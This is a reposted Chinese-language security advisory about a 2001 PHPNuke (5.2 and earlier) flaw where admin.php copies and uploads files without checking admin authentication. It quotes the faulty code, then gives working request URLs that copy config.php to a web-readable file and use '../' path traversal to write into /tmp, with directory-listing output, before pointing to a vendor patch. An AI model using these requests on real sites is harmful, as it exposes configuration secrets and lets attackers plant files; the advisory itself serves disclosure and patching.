当前位置: 王朝网络 >> php >> PHPNuke 文件泄漏和上传漏洞

PHPNuke 文件泄漏和上传漏洞

王朝php·作者佚名 2006-11-24

窄屏简体版字體: 小|中|大|超大

PHPNuke 文件泄漏和上传漏洞

受影响的系统:

PHPNuke 5.2 以及更低版本

描述:

--------------------------------------------------------------------------------

PHPNuke是一个流行的web论坛程序。它的某些版本中存在一个安全问题，可能导致远程

攻击者获取系统上的敏感信息或者上载程序。问题处在admin.php在处理文件拷贝和上传

时没有检查用户是否已经通过了管理员身份认证。

有问题的代码在：

$basedir = dirname($SCRIPT_FILENAME);

$textrows = 20;

$textcols = 85;

$udir = dirname($PHP_SELF);

if(!$wdir) $wdir="/";

if($cancel) $op="FileManager";

if($upload) {

copy($userfile,$basedir.$wdir.$userfile_name);

$lastaction = ""._UPLOADED." $userfile_name --> $wdir";

// This need a rewrite -------------------------------------> OMG! WE

AGREEEEEEEE lmao

//include("header.php");

//GraphicAdmin($hlpfile);

//html_header();

//displaydir();

$wdir2="/";

chdir($basedir . $wdir2);

//CloseTable();

//include("footer.php");

Header("Location: admin.php?op=FileManager");

exit;

}

攻击者可以获取CGI有权读取得任意文件的内容，上传文件也是可能的。

<*来源：supergate (supergate@twlc.net)

链接：http://archives.neohapsis.com/archives/bugtraq/2001-09/0203.html

测试程序：

--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

supergate (supergate@twlc.net) 提供了如下测试方法：

http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&

wdir=/images/&userfile=config.php&userfile_name=hacked.txt

这将config.php文件拷贝到/images/hacked.txt,使用

http://www.server.net/images/hacked.txt 即可看到该文件内容。

Paul Starzetz (paul@starzetz.de)发现通过在目录中指定"../"，甚至

http://somehost/nukepath/admin.php?upload=1&file=config.php&file_name=hacked.txt

&wdir=/../../../../../../../tmp/&userfile=config.php&userfile_name=hacked.txt

http://somehost/nukepath/admin.php?upload=1&wdir=/../../../../../../../tmp&

userfile=/../../../../../../../tmp/copyme.txt&

userfile_name=/../../../../../../../tmp/hacked.txt

root@somehost:/tmp > ls -la

total 20

drwxrwxrwt 8 root root 2048 Sep 25 13:37 .

drwxr-xr-x 19 root root 2048 Feb 28 2001 ..

drwxrwxrwt 2 root root 2048 Mar 6 2001 .X11-unix

-rw-r--r-- 1 root root 851 Sep 25 13:37 copyme.txt

-rwxr-xr-x 1 wwwrun wwwrun 851 Sep 25 13:37 hacked.txt

--------------------------------------------------------------------------------

建议:

厂商补丁：

厂商已经提供了升级补丁，您可以在下列地址下载：

http://www.nukeaddon.com/download.php?op=getit&lid=27

点击展开全文

上一篇：对PHP程序中的常见漏洞进行攻击之狗尾续貂

下一篇：php数据加密

免责声明：本文为网络用户发布，其观点仅代表作者个人观点，与本站无关，本站仅提供信息存储服务。文中陈述内容未经本站证实，其真实性、完整性、及时性本站不作任何保证或承诺，请读者仅作参考，并请自行核实相关内容。

没有找到您想要的？点此查看更多相关文章
相关文章▶

2023年上半年GDP全球前十五强
百态 2023-10-24

美众议院议长启动对拜登的弹劾调查
百态 2023-09-13

上海、济南、武汉等多地出现不明坠落物
探索 2023-09-06

印度或要将国名改为“巴拉特”
百态 2023-09-06

男子为女友送行，买票不登机被捕
百态 2023-08-20

手机地震预警功能怎么开？
干货 2023-08-06

女子4年卖2套房花700多万做美容：不但没变美脸，面部还出现变形
百态 2023-08-04

住户一楼被水淹还冲来8头猪
百态 2023-07-31

女子体内爬出大量瓜子状活虫
百态 2023-07-25

地球连续35年收到神秘规律性信号，网友：不要回答！
探索 2023-07-21

全球镓价格本周大涨27%
探索 2023-07-09

钱都流向了那些不缺钱的人，苦都留给了能吃苦的人
探索 2023-07-02

倩女手游刀客魅者强控制（强混乱强眩晕强睡眠）和对应控制抗性的关系
百态 2020-08-20

美国5月9日最新疫情：美国确诊人数突破131万
百态 2020-05-09

荷兰政府宣布将集体辞职
干货 2020-04-30

倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观：鹏程万里
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案神机营：射石饮羽
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山：拔刀相助
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案天工阁：鬼斧神工
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道：单枪匹马
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：与虎谋皮
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：李代桃僵
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：指鹿为马
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案金陵：小鸟依人
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案金陵：千金买邻
干货 2019-11-12